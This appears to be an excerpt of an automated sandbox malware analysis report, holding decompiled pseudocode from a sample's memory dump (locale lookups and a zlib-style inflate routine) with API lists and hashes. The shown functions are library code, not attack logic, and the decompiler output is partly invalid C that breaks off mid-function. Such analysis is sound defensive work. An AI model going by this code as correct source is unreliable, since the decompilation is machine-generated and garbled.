                                        • Instruction Fuzzy Hash: 6E31D5B2A00119ABCB10AB54ED84EEEB7B8EF48701F4440F9F90ED7244DB755A46DFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DB94F9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E29DB94F9(void* __edi, char* __esi) {
				short _v8;
				void* _t24;

				_t24 = __edi;
				if(__esi == 0 ||  *__esi == 0 || E29DB3020(__esi, ?str?) == 0) {
					if(GetLocaleInfoW( *(_t24 + 0x1c), 0x20001004,  &_v8, 2) != 0) {
						if(_v8 != 0) {
							goto L5;
						} else {
							return GetACP();
						}
					} else {
						goto L8;
					}
				} else {
					if(E29DB3020(__esi, ?str?) != 0) {
						_v8 = E29DAEC1D(__esi);
						goto L5;
					} else {
						if(GetLocaleInfoW( *(__edi + 0x1c), 0x2000000b,  &_v8, 2) == 0) {
							L8:
							return 0;
						} else {
							L5:
							return _v8;
						}
					}
				}
			}





                                        0x29db94f9
                                        0x29db9501
                                        0x29db9569
                                        0x29db9573
                                        0x00000000
                                        0x29db9575
                                        0x29db957c
                                        0x29db957c
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29db9519
                                        0x29db9528
                                        0x29db954e
                                        0x00000000
                                        0x29db952a
                                        0x29db9540
                                        0x29db956b
                                        0x29db956e
                                        0x29db9542
                                        0x29db9542
                                        0x29db9546
                                        0x29db9546
                                        0x29db9540
                                        0x29db9528

                                        APIs
                                        • GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,29DB9B36,?,29DB0DC5,?,000000BC,?,00000001,00000000,00000000), ref: 29DB9538
                                        • GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,29DB9B36,?,29DB0DC5,?,000000BC,?,00000001,00000000,00000000), ref: 29DB9561
                                        • GetACP.KERNEL32(?,?,29DB9B36,?,29DB0DC5,?,000000BC,?,00000001,00000000), ref: 29DB9575
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InfoLocale
                                        • String ID: ACP$OCP
                                        • API String ID: 2299586839-711371036
                                        • Opcode ID: f8edce63b29506c62e335a06d6e29d3e46749d3719c630122a8da3a475e467f8
                                        • Instruction ID: 4d56ce8b670b8836da622cabd5eba872b286253ddc51b3e778938b6bfcec03f5
                                        • Opcode Fuzzy Hash: f8edce63b29506c62e335a06d6e29d3e46749d3719c630122a8da3a475e467f8
                                        • Instruction Fuzzy Hash: 7101D47154568ABBEB059B60EC15B5E77E8AF1065CF10805DE103EA881DB30CB43B754
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DA3A68 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 76%
                                        			E29DA3A68(void* __ebx, void* __edi, signed int __esi) {
				void* _t22;
				void* _t23;
				void* _t29;
				void* _t30;
				signed int _t31;
				void* _t32;
				signed int _t33;
				void* _t35;
				void* _t36;

				_t31 = __esi;
				_t29 = __edi;
				_t22 = __ebx;
				do {
					_t28 =  *(_t22 + _t31 * 4) & 0x0000ffff;
					GetLocaleInfoA( *(_t22 + _t31 * 4) & 0x0000ffff, 2, _t33 - 0x204, 0x200);
					if(_t29 == 0) {
						_t28 =  *(_t33 - 0x208);
						wsprintfA( *(_t33 - 0x208), "%s", _t33 - 0x204);
						_t36 = _t35 + 0xc;
					} else {
						wsprintfA( *(_t33 - 0x208), "%s / %s",  *(_t33 - 0x208), _t33 - 0x204);
						_t36 = _t35 + 0x10;
					}
					_t29 = _t29 + 1;
					E29DB5640(_t33 - 0x204, 0, 0x200);
					_t31 = _t31 + 1;
					_t35 = _t36 + 0xc;
				} while (_t31 <  *((intOrPtr*)(_t33 - 0x20c)));
				if(_t22 != 0) {
					LocalFree(_t22);
				}
				_pop(_t30);
				_pop(_t32);
				_pop(_t23);
				return E29DADF46( *(_t33 - 0x208), _t23,  *(_t33 - 4) ^ _t33, _t28, _t30, _t32);
			}












                                        0x29da3a68
                                        0x29da3a68
                                        0x29da3a68
                                        0x29da3a70
                                        0x29da3a70
                                        0x29da3a83
                                        0x29da3a8b
                                        0x29da3aac
                                        0x29da3abf
                                        0x29da3ac5
                                        0x29da3a8d
                                        0x29da3aa1
                                        0x29da3aa7
                                        0x29da3aa7
                                        0x29da3ad6
                                        0x29da3ad7
                                        0x29da3adc
                                        0x29da3add
                                        0x29da3ae0
                                        0x29da3aea
                                        0x29da3aed
                                        0x29da3aed
                                        0x29da3afc
                                        0x29da3afd
                                        0x29da3b00
                                        0x29da3b09

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: wsprintf$FreeInfoLocalLocale_memset
                                        • String ID: %s / %s
                                        • API String ID: 3205847202-2910687431
                                        • Opcode ID: d62646763f4637ab28509b1a6afcec14dbf33029a74727cf9df6e1c41ffe5f27
                                        • Instruction ID: 55f4a4959f2e784ef4b459fba2c65702fd6b9794884d6f9be777489059fc49c3
                                        • Opcode Fuzzy Hash: d62646763f4637ab28509b1a6afcec14dbf33029a74727cf9df6e1c41ffe5f27
                                        • Instruction Fuzzy Hash: 9801DB76940324ABD710EB94DCC9FEEB37CEF44701F0041D9FA5AA2181DB319A519A61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D8A7A0 Relevance: 7.8, APIs: 1, Strings: 3, Instructions: 789COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 91%
                                        			E29D8A7A0(unsigned int* __eax, signed int* __ecx, unsigned int _a4) {
				unsigned int _v8;
				unsigned int _v12;
				unsigned int _v16;
				unsigned int _v20;
				unsigned int _v24;
				unsigned int _v28;
				unsigned int _v32;
				unsigned int _v36;
				unsigned int _v40;
				unsigned int _v44;
				unsigned int _v48;
				unsigned int _t399;
				unsigned int* _t405;
				intOrPtr _t408;
				unsigned int _t410;
				signed int _t411;
				unsigned int _t423;
				unsigned int _t424;
				signed int _t434;
				signed int* _t438;

				_t405 = __eax;
				_t438 = __ecx;
				_t423 =  *((intOrPtr*)(__ecx + 0x34));
				_v16 =  *((intOrPtr*)(__eax + 4));
				_t408 =  *((intOrPtr*)(__ecx + 0x30));
				_v12 =  *((intOrPtr*)(__eax));
				_t399 =  *(__ecx + 0x20);
				_t434 =  *(__ecx + 0x1c);
				_v8 = _t399;
				_v20 = _t423;
				if(_t423 >= _t408) {
					_t410 =  *((intOrPtr*)(__ecx + 0x2c)) - _t423;
					_t424 = 1;
				} else {
					_t424 = 1;
					_t410 = _t408 - _t423 - 1;
				}
				_v28 = _t410;
				_t411 =  *_t438;
				if(_t411 > 9) {
					L96:
					_push(0xfffffffe);
					goto L97;
				} else {
					do {
						switch( *((intOrPtr*)(_t411 * 4 +  &M29D8B114))) {
							case 0:
								if(_t434 >= 3) {
									L8:
									_t416 = _t399 & 0x00000007;
									_t417 = _t416 >> 1;
									_t438[6] = _t416 & 0x00000001;
									if(_t417 > 3) {
										goto L94;
									} else {
										switch( *((intOrPtr*)(_t417 * 4 +  &M29D8B13C))) {
											case 0:
												goto L10;
											case 1:
												goto L11;
											case 2:
												goto L13;
											case 3:
												goto L103;
										}
									}
								} else {
									while(_v16 != 0) {
										_v16 = _v16 - _t424;
										_t432 = ( *_v12 & 0x000000ff) << _t434;
										_t434 = _t434 + 8;
										_a4 = 0;
										_t399 = _t399 | _t432;
										_t424 = 1;
										_v12 = _v12 + 1;
										_v8 = _t399;
										if(_t434 < 3) {
											continue;
										} else {
											goto L8;
										}
										goto L124;
									}
									goto L100;
								}
								goto L124;
							case 1:
								__eflags = __edi - 0x20;
								if(__edi >= 0x20) {
									L17:
									__ecx = __eax;
									__eax =  !__eax;
									__ecx = __ecx & 0x0000ffff;
									__eax = __eax >> 0x10;
									__eflags = __eax - __ecx;
									if(__eax != __ecx) {
										 *__esi = 9;
										 *(__ebx + 0x18) = "invalid stored block lengths";
										_push(0xfffffffd);
										goto L97;
									} else {
										__eax = 0;
										__edi = 0;
										 *(__esi + 4) = __ecx;
										_v8 = 0;
										__eflags = __ecx;
										if(__ecx == 0) {
											 *(__esi + 0x18) =  ~( *(__esi + 0x18));
											asm("sbb ecx, ecx");
											__ecx =  ~( *(__esi + 0x18)) & 0x00000007;
											 *__esi =  ~( *(__esi + 0x18)) & 0x00000007;
										} else {
											__ecx = 2;
											 *__esi = 2;
										}
										goto L95;
									}
								} else {
									while(1) {
										__eflags = _v16;
										if(_v16 == 0) {
											goto L104;
										}
										_v16 = _v16 - __edx;
										__ecx = _v12;
										__edx =  *_v12 & 0x000000ff;
										__ecx = __edi;
										__edx = ( *_v12 & 0x000000ff) << __cl;
										__edi = __edi + 8;
										_a4 = 0;
										__eax = __eax | ( *_v12 & 0x000000ff) << __cl;
										__edx = 1;
										_v12 = _v12 + 1;
										_v8 = __eax;
										__eflags = __edi - 0x20;
										if(__edi < 0x20) {
											continue;
										} else {
											goto L17;
										}
										goto L124;
									}
									goto L104;
								}
								goto L124;
							case 2:
								__eflags = _v16;
								if(_v16 == 0) {
									L104:
									__eax = _v8;
									 *(__esi + 0x20) = _v8;
									goto L101;
								} else {
									__eflags = _v28;
									if(_v28 != 0) {
										L38:
										__eax =  *(__esi + 4);
										__ecx = _v16;
										_a4 = 0;
										_v24 = __eax;
										__eflags = __eax - __ecx;
										if(__eax > __ecx) {
											__eax = __ecx;
											_v24 = __ecx;
										}
										__ecx = _v28;
										__eflags = __eax - __ecx;
										if(__eax > __ecx) {
											_v24 = __ecx;
										}
										__edx = _v24;
										__eax = _v12;
										__ecx = _v20;
										__eax = E29DB0010(_v20, _v12, _v24);
										__eax = _v24;
										_v12 = _v12 + __eax;
										_v16 = _v16 - __eax;
										_v20 = _v20 + __eax;
										_v28 = _v28 - __eax;
										_t85 = __esi + 4;
										 *_t85 =  *(__esi + 4) - __eax;
										__eflags =  *_t85;
										__eax = _v8;
										if( *_t85 == 0) {
											 *(__esi + 0x18) =  ~( *(__esi + 0x18));
											asm("sbb edx, edx");
											__edx =  ~( *(__esi + 0x18)) & 0x00000007;
											 *__esi = __edx;
										}
										goto L94;
									} else {
										__edx =  *(__esi + 0x2c);
										__eflags = _v20 - __edx;
										if(_v20 != __edx) {
											L29:
											__ecx = _a4;
											__eax = _v20;
											 *(__esi + 0x34) = _v20;
											__eax = E29D89EF0(__ebx, __esi, _a4);
											__ecx =  *(__esi + 0x30);
											_a4 = __eax;
											__eax =  *(__esi + 0x34);
											_v20 = __eax;
											__eflags = __eax - __ecx;
											if(__eax >= __ecx) {
												__edx =  *(__esi + 0x2c);
												__edx =  *(__esi + 0x2c) - __eax;
												__eflags = __edx;
											} else {
												__ecx = __ecx - __eax;
												__edx = __ecx - __eax - 1;
											}
											__eax =  *(__esi + 0x2c);
											_v28 = __edx;
											__eflags = _v20 - __eax;
											if(_v20 == __eax) {
												__edx =  *(__esi + 0x28);
												__eflags = __edx - __ecx;
												if(__eflags != 0) {
													_v20 = __edx;
													if(__eflags >= 0) {
														__eax = __eax - __edx;
														__eflags = __eax;
														_v28 = __eax;
													} else {
														__ecx = __ecx - __edx;
														_v28 = __ecx;
													}
												}
											}
											__eflags = _v28;
											if(_v28 == 0) {
												__ecx = _v8;
												__eax = _v12;
												__edx = _v16;
												 *(__esi + 0x20) = _v8;
												 *(__esi + 0x1c) = __edi;
												 *__ebx = __eax;
												__eax = _a4;
												 *(__ebx + 4) = _v16;
												_push(_a4);
												goto L99;
											} else {
												goto L38;
											}
										} else {
											__eax =  *(__esi + 0x30);
											__ecx =  *(__esi + 0x28);
											__eflags = __ecx - __eax;
											if(__eflags == 0) {
												goto L29;
											} else {
												_v20 = __ecx;
												if(__eflags >= 0) {
													__edx = __edx - __ecx;
													__eflags = __edx;
													__eax = __edx;
													_v28 = __edx;
												} else {
													__eax = __eax - __ecx;
													__eax = __eax - 1;
													_v28 = __eax;
												}
												__eflags = __eax;
												if(__eax != 0) {
													goto L38;
												} else {
													goto L29;
												}
											}
										}
									}
								}
								goto L124;
							case 3:
								__eflags = __edi - 0xe;
								if(__edi >= 0xe) {
									L47:
									__eax = __eax & 0x00003fff;
									__ecx = __eax;
									__ecx = __eax & 0x0000001f;
									 *(__esi + 4) = __eax;
									__eflags = __ecx - 0x1d;
									if(__ecx > 0x1d) {
										L109:
										 *__esi = 9;
										 *(__ebx + 0x18) = "too many length or distance symbols";
										goto L110;
									} else {
										__eax = __eax >> 5;
										__eax = __eax & 0x0000001f;
										__eflags = __eax - 0x1d;
										if(__eax > 0x1d) {
											goto L109;
										} else {
											__edx =  *(__ebx + 0x20);
											__eax = __eax + __ecx + 0x102;
											__ecx =  *(__ebx + 0x28);
											_push(4);
											_push(__eax);
											_push( *(__ebx + 0x28));
											__eax =  *( *(__ebx + 0x20))();
											__esp = __esp + 0xc;
											 *(__esi + 0xc) = __eax;
											__eflags = __eax;
											if(__eax == 0) {
												goto L108;
											} else {
												_v8 = _v8 >> 0xe;
												__eax = _v8;
												__edi = __edi - 0xe;
												__eflags = __edi;
												 *(__esi + 8) = 0;
												 *__esi = 4;
												__edx = 1;
												goto L51;
											}
										}
									}
								} else {
									while(1) {
										__eflags = _v16;
										if(_v16 == 0) {
											goto L107;
										}
										_v16 = _v16 - __edx;
										__ecx = _v12;
										__edx =  *_v12 & 0x000000ff;
										__ecx = __edi;
										__edx = ( *_v12 & 0x000000ff) << __cl;
										__edi = __edi + 8;
										_a4 = 0;
										__eax = __eax | ( *_v12 & 0x000000ff) << __cl;
										__edx = 1;
										_v12 = _v12 + 1;
										_v8 = __eax;
										__eflags = __edi - 0xe;
										if(__edi < 0xe) {
											continue;
										} else {
											goto L47;
										}
										goto L124;
									}
									goto L107;
								}
								goto L124;
							case 4:
								L51:
								 *(__esi + 4) =  *(__esi + 4) >> 0xa;
								__ecx = ( *(__esi + 4) >> 0xa) + 4;
								__eflags =  *(__esi + 8) - ( *(__esi + 4) >> 0xa) + 4;
								if( *(__esi + 8) >= ( *(__esi + 4) >> 0xa) + 4) {
									L56:
									__eax = 0x13;
									__eflags =  *(__esi + 8) - 0x13;
									while( *(__esi + 8) < 0x13) {
										__edx =  *(__esi + 8);
										__ecx =  *(0x29dcf0a0 +  *(__esi + 8) * 4);
										__edx =  *(__esi + 0xc);
										 *( *(__esi + 0xc) +  *(0x29dcf0a0 +  *(__esi + 8) * 4) * 4) = 0;
										 *(__esi + 8) =  *(__esi + 8) + 1;
										__eflags =  *(__esi + 8) - 0x13;
									}
									__ecx =  *(__esi + 0x24);
									__edx = __esi + 0x14;
									__eax = __esi + 0x10;
									 *(__esi + 0x10) = 7;
									__eax =  *(__esi + 0xc);
									__eax = E29D8B720(__ebx,  *(__esi + 0xc),  *(__esi + 0xc), __esi + 0x14,  *(__esi + 0x24));
									_v24 = __eax;
									__eflags = __eax;
									if(__eax != 0) {
										__eflags = _v24 - 0xfffffffd;
										if(_v24 == 0xfffffffd) {
											__edx =  *(__esi + 0xc);
											__eax =  *(__ebx + 0x28);
											__ecx =  *(__ebx + 0x24);
											_push( *(__esi + 0xc));
											_push( *(__ebx + 0x28));
											__eax =  *( *(__ebx + 0x24))();
											__esp = __esp + 8;
											 *__esi = 9;
										}
										__edx = _v8;
										__eax = _v16;
										 *(__esi + 0x20) = _v8;
										 *(__esi + 0x1c) = __edi;
										 *(__ebx + 4) = _v16;
										__eax = _v12;
										 *__ebx = __eax;
										__eax = _v24;
										_push(_v24);
										goto L99;
									} else {
										 *(__esi + 8) = __eax;
										__eax = _v8;
										 *__esi = 5;
										goto L61;
									}
								} else {
									do {
										__eflags = __edi - 3;
										if(__edi >= 3) {
											goto L55;
										} else {
											while(1) {
												__eflags = _v16;
												if(_v16 == 0) {
													goto L107;
												}
												_v16 = _v16 - __edx;
												_v12 =  *_v12 & 0x000000ff;
												__ecx = __edi;
												__edx = ( *_v12 & 0x000000ff) << __cl;
												__edi = __edi + 8;
												_a4 = 0;
												__eax = __eax | ( *_v12 & 0x000000ff) << __cl;
												__edx = 1;
												_v12 = _v12 + 1;
												_v8 = __eax;
												__eflags = __edi - 3;
												if(__edi < 3) {
													continue;
												} else {
													goto L55;
												}
												goto L124;
											}
											goto L107;
										}
										goto L124;
										L55:
										__ecx =  *(__esi + 8);
										__edx =  *(0x29dcf0a0 +  *(__esi + 8) * 4);
										__ecx =  *(__esi + 0xc);
										 *( *(__esi + 0xc) +  *(0x29dcf0a0 +  *(__esi + 8) * 4) * 4) = __eax;
										__eax = _v8;
										__edx = 1;
										 *(__esi + 8) =  *(__esi + 8) + 1;
										 *(__esi + 4) =  *(__esi + 4) >> 0xa;
										__eax = _v8 >> 3;
										__ecx = ( *(__esi + 4) >> 0xa) + 4;
										__edi = __edi - 3;
										_v8 = __eax;
										__eflags =  *(__esi + 8) - ( *(__esi + 4) >> 0xa) + 4;
									} while ( *(__esi + 8) < ( *(__esi + 4) >> 0xa) + 4);
									goto L56;
								}
								goto L124;
							case 5:
								L61:
								__ecx =  *(__esi + 4);
								__ecx = __ecx >> 5;
								__edx = __ecx >> 0x00000005 & 0x0000001f;
								_t148 = __ecx + 0x102; // 0x110
								__ecx = __edx + _t148;
								__eflags =  *(__esi + 8) - __edx + _t148;
								if( *(__esi + 8) >= __edx + _t148) {
									L84:
									__ecx =  *(__esi + 0x24);
									__eax =  *(__esi + 4);
									__edx =  &_v48;
									__ecx =  &_v44;
									 &_v28 =  *(__esi + 0xc);
									 &_v32 = __eax;
									__eax >> 5 = __eax >> 0x00000005 & 0x0000001f;
									__ecx = (__eax >> 0x00000005 & 0x0000001f) + 1;
									__eax = __eax + 0x101;
									 *(__esi + 0x14) = 0;
									_v32 = 9;
									_v28 = 6;
									__eax = E29D8B7B0(__ebx, __eax, __ecx,  *(__esi + 0xc),  &_v32,  &_v28,  &_v44,  &_v48,  *(__esi + 0x24));
									_v24 = __eax;
									__eflags = __eax;
									if(__eax != 0) {
										__eflags = _v24 - 0xfffffffd;
										if(_v24 == 0xfffffffd) {
											__eax =  *(__esi + 0xc);
											__ecx =  *(__ebx + 0x28);
											__edx =  *(__ebx + 0x24);
											_push( *(__esi + 0xc));
											_push( *(__ebx + 0x28));
											__eax =  *( *(__ebx + 0x24))();
											__esp = __esp + 8;
											 *__esi = 9;
										}
										__eax = _v8;
										__ecx = _v16;
										 *(__esi + 0x20) = _v8;
										__eax = _v12;
										 *(__esi + 0x1c) = __edi;
										__eax = __eax -  *__ebx;
										 *(__ebx + 4) = _v16;
										__ecx = _v24;
										_t372 = __ebx + 8;
										 *_t372 =  *(__ebx + 8) + __eax -  *__ebx;
										__eflags =  *_t372;
										 *__ebx = __eax;
										__eax = _v20;
										 *(__esi + 0x34) = _v20;
										__eax = E29D89EF0(__ebx, __esi, _v24);
										_pop(__edi);
										_pop(__esi);
										return __eax;
									} else {
										__edx =  *(__ebx + 0x28);
										__eax =  *(__ebx + 0x20);
										_push(0x1c);
										_push(1);
										_push( *(__ebx + 0x28));
										__eax =  *( *(__ebx + 0x20))();
										__esp = __esp + 0xc;
										__eflags = __eax;
										if(__eax == 0) {
											L108:
											__edx = _v8;
											__eax = _v16;
											 *(__esi + 0x20) = _v8;
											 *(__esi + 0x1c) = __edi;
											 *(__ebx + 4) = _v16;
											_push(0xfffffffc);
											goto L98;
										} else {
											__cl = _v32;
											 *(__eax + 0x10) = __cl;
											__ecx = _v44;
											 *((char*)(__eax + 0x11)) = _v28;
											__edx = _v48;
											 *__eax = 0;
											 *(__eax + 0x14) = _v44;
											 *(__eax + 0x18) = _v48;
											 *(__esi + 4) = __eax;
											__eax =  *(__esi + 0xc);
											__ecx =  *(__ebx + 0x28);
											__edx =  *(__ebx + 0x24);
											_push( *(__esi + 0xc));
											_push( *(__ebx + 0x28));
											__eax =  *( *(__ebx + 0x24))();
											__esp = __esp + 8;
											 *__esi = 6;
											goto L87;
										}
									}
								} else {
									__edx = 1;
									while(1) {
										__ecx =  *(__esi + 0x10);
										__eflags = __edi - __ecx;
										if(__edi >= __ecx) {
											goto L67;
										} else {
											goto L65;
										}
										while(1) {
											L65:
											__eflags = _v16;
											if(_v16 == 0) {
												break;
											}
											_v16 = _v16 - __edx;
											_v12 =  *_v12 & 0x000000ff;
											__ecx = __edi;
											__edx = ( *_v12 & 0x000000ff) << __cl;
											__ecx =  *(__esi + 0x10);
											__edi = __edi + 8;
											_a4 = 0;
											__eax = __eax | ( *_v12 & 0x000000ff) << __cl;
											__edx = 1;
											_v12 = _v12 + 1;
											_v8 = __eax;
											__eflags = __edi - __ecx;
											if(__edi < __ecx) {
												continue;
											} else {
												goto L67;
											}
											goto L124;
										}
										L107:
										__eax = _v12;
										__ecx = _v8;
										 *(__esi + 0x20) = _v8;
										__ecx = _a4;
										 *(__esi + 0x1c) = __edi;
										__edx = __eax;
										__edx = __eax -  *__ebx;
										 *__ebx = __eax;
										__eax = _v20;
										_t316 = __ebx + 8;
										 *_t316 =  *(__ebx + 8) + __edx;
										__eflags =  *_t316;
										 *(__ebx + 4) = 0;
										 *(__esi + 0x34) = _v20;
										__eax = E29D89EF0(__ebx, __esi, _a4);
										_pop(__edi);
										_pop(__esi);
										return __eax;
										goto L124;
										L67:
										__ecx =  *(0x29dcdf58 + __ecx * 4);
										__edx =  *(__esi + 0x14);
										__edx =  *(__esi + 0x14) + __ecx * 8;
										__ecx =  *(__edx + 1) & 0x000000ff;
										__edx =  *(__edx + 4);
										_v24 = __ecx;
										_v40 = __edx;
										__eflags = __edx - 0x10;
										if(__edx >= 0x10) {
											__eflags = __edx - 0x12;
											if(__edx != 0x12) {
												_t178 = __edx - 0xe; // 0x0
												__ecx = _t178;
												_v32 = _t178;
											} else {
												_v32 = 7;
											}
											__ecx = 0;
											__eflags = __edx - 0x12;
											0 | __edx == 0x00000012 = 3 + (__edx == 0x12) * 8;
											_v28 = 3 + (__edx == 0x12) * 8;
											__ecx = _v24;
											__ecx = _v24 + _v32;
											_v36 = __ecx;
											__eflags = __edi - __ecx;
											if(__edi >= __ecx) {
												L76:
												__ecx = _v24;
												__eax = __eax >> __cl;
												__ecx = _v32;
												 *(0x29dcdf58 + __ecx * 4) =  *(0x29dcdf58 + __ecx * 4) & __eax;
												_v28 = _v28 + ( *(0x29dcdf58 + __ecx * 4) & __eax);
												__eax = __eax >> __cl;
												__edi = __edi - __ecx;
												__ecx =  *(__esi + 8);
												_v8 = __eax;
												__eax =  *(__esi + 4);
												__eax = __eax >> 5;
												__edx = __eax >> 0x00000005 & 0x0000001f;
												_t208 = __eax + 0x102; // 0x110
												__eax = __edx + _t208;
												_v28 = _v28 + __ecx;
												__eflags = _v28 + __ecx - __eax;
												if(_v28 + __ecx > __eax) {
													L114:
													__ecx =  *(__esi + 0xc);
													__edx =  *(__ebx + 0x28);
													__eax =  *(__ebx + 0x24);
													_push( *(__esi + 0xc));
													_push( *(__ebx + 0x28));
													__eax =  *( *(__ebx + 0x24))();
													__ecx = _v8;
													__eax = _v12;
													__edx = _v16;
													 *__esi = 9;
													 *(__ebx + 0x18) = "invalid bit length repeat";
													 *(__esi + 0x20) = _v8;
													 *(__esi + 0x1c) = __edi;
													__eax = __eax -  *__ebx;
													 *(__ebx + 4) = _v16;
													__edx = _v20;
													_t358 = __ebx + 8;
													 *_t358 =  *(__ebx + 8) + __eax -  *__ebx;
													__eflags =  *_t358;
													 *__ebx = __eax;
													 *(__esi + 0x34) = _v20;
													__eax = E29D89EF0(__ebx, __esi, 0xfffffffd);
													_pop(__edi);
													_pop(__esi);
													return __eax;
												} else {
													__eflags = _v40 - 0x10;
													if(_v40 != 0x10) {
														__eax = 0;
														__eflags = 0;
														goto L81;
													} else {
														__eflags = __ecx - 1;
														if(__ecx < 1) {
															goto L114;
														} else {
															__eax =  *(__esi + 0xc);
															__eax =  *( *(__esi + 0xc) + __ecx * 4 - 4);
															do {
																L81:
																__edx =  *(__esi + 0xc);
																 *( *(__esi + 0xc) + __ecx * 4) = __eax;
																__ecx = __ecx + 1;
																_t218 =  &_v28;
																 *_t218 = _v28 - 1;
																__eflags =  *_t218;
															} while ( *_t218 != 0);
															 *(__esi + 8) = __ecx;
															__edx = 1;
															goto L83;
														}
													}
												}
											} else {
												__ecx = 1;
												while(1) {
													__eflags = _v16;
													if(_v16 == 0) {
														break;
													}
													__edx = _v12;
													_v16 = _v16 - __ecx;
													__edx =  *_v12 & 0x000000ff;
													__ecx = __edi;
													__edx = ( *_v12 & 0x000000ff) << __cl;
													__ecx = 1;
													_v12 = _v12 + 1;
													__edi = __edi + 8;
													__eax = __eax | ( *_v12 & 0x000000ff) << __cl;
													_a4 = 0;
													_v8 = __eax;
													__eflags = __edi - _v36;
													if(__edi < _v36) {
														continue;
													} else {
														goto L76;
													}
													goto L124;
												}
												L100:
												_t438[8] = _v8;
												L101:
												_t402 = _v12;
												_t438[7] = _t434;
												_t414 = _t402 -  *_t405;
												 *_t405 = _t402;
												_t405[1] = 0;
												_push(_a4);
												goto L99;
											}
										} else {
											__eax = __eax >> __cl;
											__edi = __edi - __ecx;
											__ecx =  *(__esi + 0xc);
											_v8 = __eax;
											__eax =  *(__esi + 8);
											 *( *(__esi + 0xc) +  *(__esi + 8) * 4) = __edx;
											__edx = 1;
											 *(__esi + 8) =  *(__esi + 8) + 1;
											L83:
											__eax =  *(__esi + 4);
											__eax = __eax >> 5;
											__ecx = __eax >> 0x00000005 & 0x0000001f;
											_t223 = __eax + 0x102; // 0x110
											__eax = __ecx + _t223;
											__eflags =  *(__esi + 8) - __ecx + _t223;
											if( *(__esi + 8) < __ecx + _t223) {
												__eax = _v8;
												__ecx =  *(__esi + 0x10);
												__eflags = __edi - __ecx;
												if(__edi >= __ecx) {
													goto L67;
												} else {
													goto L65;
												}
											} else {
												goto L84;
											}
										}
										goto L124;
									}
								}
								goto L124;
							case 6:
								L87:
								__eax = _v8;
								__ecx = _v16;
								 *(__esi + 0x20) = _v8;
								__eax = _v12;
								 *(__esi + 0x1c) = __edi;
								__eax = __eax -  *__ebx;
								 *(__ebx + 4) = _v16;
								__ecx = _a4;
								 *(__ebx + 8) =  *(__ebx + 8) + __eax -  *__ebx;
								 *__ebx = __eax;
								__eax = _v20;
								 *(__esi + 0x34) = _v20;
								__eax = __ebx;
								__ecx = __esi;
								__eax = E29D8A030(__ebx, __esi, _a4);
								__eflags = __eax - 1;
								if(__eax != 1) {
									goto L121;
								} else {
									__edx =  *(__esi + 4);
									__eax =  *(__ebx + 0x28);
									__ecx =  *(__ebx + 0x24);
									_push( *(__esi + 4));
									_push( *(__ebx + 0x28));
									_a4 = 0;
									 *( *(__ebx + 0x24))() =  *(__ebx + 4);
									__ecx =  *(__esi + 0x20);
									__edx =  *__ebx;
									__edi =  *(__esi + 0x1c);
									_v16 =  *(__ebx + 4);
									__eax =  *(__esi + 0x30);
									_v8 =  *(__esi + 0x20);
									__ecx =  *(__esi + 0x34);
									__esp = __esp + 8;
									_v12 = __edx;
									_v20 = __ecx;
									__eflags = __ecx - __eax;
									if(__ecx >= __eax) {
										__eax =  *(__esi + 0x2c);
										__eax =  *(__esi + 0x2c) - __ecx;
										__eflags = __eax;
									} else {
										__eax = __eax - __ecx;
										__eax = __eax - 1;
									}
									__eflags =  *(__esi + 0x18);
									_v28 = __eax;
									if( *(__esi + 0x18) != 0) {
										 *__esi = 7;
										goto L119;
									} else {
										 *__esi = 0;
										goto L93;
									}
								}
								goto L124;
							case 7:
								L119:
								__ecx = _a4;
								__eax = _v20;
								 *(__esi + 0x34) = _v20;
								__eax = E29D89EF0(__ebx, __esi, _a4);
								__ecx =  *(__esi + 0x34);
								_v20 = __ecx;
								__eflags =  *(__esi + 0x30) - __ecx;
								if( *(__esi + 0x30) == __ecx) {
									 *__esi = 8;
									goto L123;
								} else {
									__edx = _v8;
									__ecx = _v16;
									 *(__esi + 0x20) = _v8;
									 *(__esi + 0x1c) = __edi;
									 *(__ebx + 4) = _v16;
									__ecx = _v12;
									__edx = __ecx;
									__edx = __ecx -  *__ebx;
									 *__ebx = __ecx;
									__ecx = _v20;
									_t389 = __ebx + 8;
									 *_t389 =  *(__ebx + 8) + __edx;
									__eflags =  *_t389;
									 *(__esi + 0x34) = _v20;
									L121:
									__eax = E29D89EF0(__ebx, __esi, __eax);
									_pop(__edi);
									_pop(__esi);
									return __eax;
								}
								goto L124;
							case 8:
								L123:
								__edx = _v8;
								__eax = _v16;
								 *(__esi + 0x20) = _v8;
								 *(__esi + 0x1c) = __edi;
								 *(__ebx + 4) = _v16;
								_push(1);
								goto L98;
							case 9:
								L110:
								__eax = _v8;
								__ecx = _v16;
								 *(__esi + 0x20) = _v8;
								__eax = _v12;
								 *(__esi + 0x1c) = __edi;
								__edx = __eax;
								__edx = __eax -  *__ebx;
								 *__ebx = __eax;
								__eax = _v20;
								_t332 = __ebx + 8;
								 *_t332 =  *(__ebx + 8) + __edx;
								__eflags =  *_t332;
								 *(__ebx + 4) = _v16;
								 *(__esi + 0x34) = _v20;
								__eax = E29D89EF0(__ebx, __esi, 0xfffffffd);
								_pop(__edi);
								_pop(__esi);
								return __eax;
								goto L124;
							case 0xa:
								L10:
								_t436 = _t434 - 3;
								_t419 = _t436 & 0x00000007;
